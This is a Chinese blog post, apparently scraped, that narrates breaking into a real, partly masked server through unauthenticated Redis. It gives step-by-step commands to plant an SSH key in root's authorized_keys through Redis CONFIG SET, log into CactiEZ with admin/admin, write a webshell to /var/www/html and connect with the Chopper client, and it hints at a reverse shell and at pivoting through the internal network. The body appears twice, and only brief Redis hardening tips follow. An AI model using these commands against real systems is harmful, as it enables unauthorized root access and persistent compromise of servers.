利用未授权的redis写webshell
来源:互联网 发布:linux中文输入法 编辑:程序博客网 时间:2024/04/28 01:56
最近redis的话题比较多,因此就有了下面这个故事。
目标IP:210.73.90.xxx
利用漏洞:未授权的redis访问
漏洞利用1:
1)本地生成秘钥
root@GanDolf:~# ssh-keygen -t rsa
2)将公钥写入一个文件
root@GanDolf:~# cd /root/.ssh/
root@GanDolf:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
3)连接redis写入文件root@GanDolf:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit
OKroot@GanDolf:~/.ssh# redis-cli -h 210.73.90.xxx
210.73.90.xxx:6379> config set dir /root/.ssh/OK(1.39s)210.73.90.xxx:6379> CONFIG GET dir1) "dir"2) "/root/.ssh"210.73.90.xxx:6379> config set dbfilename "authorized_keys"OK(1.03s)210.73.90.xxx:6379> SAVEsaOK(1.40s)210.73.90.xxx:6379> SAVEOK210.73.90.xxx:6379> exitroot@GanDolf:~/.ssh# ssh
4)连接服务器
root@GanDolf:~/.ssh# ssh -i id_rsa root@210.73.90.xxx
发现为开启22端口
到此此方法失败
漏洞利用2:
nmap扫描结果:
80 443 开放
访问80原来是CactiEZ v10版本尝试弱口令登录admin admin登录成功,发现无长传路径。
尝试redis写webshell
前提:网站的物理路径
手动几次没爆成功
转向挖CactiEZ v10 的一些安装信息于是乎,下载CactiEZ v10 自己搭建虚拟安装,启动找出物理路径为:
/var/www/html
于是利用redis写shell
于是菜刀连起:
最后丢个小码。看看能不能挖到啥东西,后续可以反弹到本地,内容漫游下(好多交换机,主机^__^)
最后总结关于redis的安全建议:
1)修改默认端口2)监听本地端口3)使用非root启动,否则出现漏洞1,直接拿到root权限4)修改配置文件,禁用相关命令
# rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52
目标IP:210.73.90.xxx
利用漏洞:未授权的redis访问
漏洞利用1:
1)本地生成秘钥
root@GanDolf:~# ssh-keygen -t rsa
2)将公钥写入一个文件
root@GanDolf:~# cd /root/.ssh/
root@GanDolf:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
3)连接redis写入文件root@GanDolf:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit
OKroot@GanDolf:~/.ssh# redis-cli -h 210.73.90.xxx
210.73.90.xxx:6379> config set dir /root/.ssh/OK(1.39s)210.73.90.xxx:6379> CONFIG GET dir1) "dir"2) "/root/.ssh"210.73.90.xxx:6379> config set dbfilename "authorized_keys"OK(1.03s)210.73.90.xxx:6379> SAVEsaOK(1.40s)210.73.90.xxx:6379> SAVEOK210.73.90.xxx:6379> exitroot@GanDolf:~/.ssh# ssh
4)连接服务器
root@GanDolf:~/.ssh# ssh -i id_rsa root@210.73.90.xxx
发现为开启22端口
到此此方法失败
漏洞利用2:
nmap扫描结果:
80 443 开放
访问80原来是CactiEZ v10版本尝试弱口令登录admin admin登录成功,发现无长传路径。
尝试redis写webshell
前提:网站的物理路径
手动几次没爆成功
转向挖CactiEZ v10 的一些安装信息于是乎,下载CactiEZ v10 自己搭建虚拟安装,启动找出物理路径为:
/var/www/html
于是利用redis写shell
于是菜刀连起:
最后丢个小码。看看能不能挖到啥东西,后续可以反弹到本地,内容漫游下(好多交换机,主机^__^)
最后总结关于redis的安全建议:
1)修改默认端口2)监听本地端口3)使用非root启动,否则出现漏洞1,直接拿到root权限4)修改配置文件,禁用相关命令
# rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52
0 0
- 利用未授权的redis写webshell
- 利用redis写webshell
- Redis安全配置和未授权访问写
- Redis 未授权访问配合 SSH key 文件利用分析
- Redis 未授权访问配合 SSH key 文件利用分析
- Redis 未授权访问漏洞讲解利用加批量寻找
- 不请自来 | Redis 未授权访问漏洞深度利用
- jsp写的webshell
- Redis 未授权访问漏洞
- Redis 未授权访问缺陷
- Redis未授权访问漏洞
- Redis未授权访问漏洞
- redis未授权访问漏洞
- Redis 未授权访问漏洞
- 验证docker的Redis镜像也存在未授权访问漏洞
- 提权的魅力——redis未授权漏洞
- Redis非授权访问获取webshell及相关问题
- proftpd的mod_copy模块未授权调用利用记录
- Android 蓝牙BLE (蓝牙成长之路)2
- Checking Table 设计模式 - 从概念、建模、设计到实现
- 使用外观模式(Facade)调用微信企业号API
- Android动画机制学习---animator(二)
- redis下载
- 利用未授权的redis写webshell
- 循序渐进玩坦克
- Ubuntu Linux下设置IP的配置命令
- perl 匹配 Linux grep 出来的结果失败
- linux下用core和gdb查询出现"段错误"的地方
- 影吧项目常用。。命令
- js 刷新页面window.location.reload()
- SpringMVC+Json构建基于Restful风格的应用
- 一位SDS创业者眼中的Ceph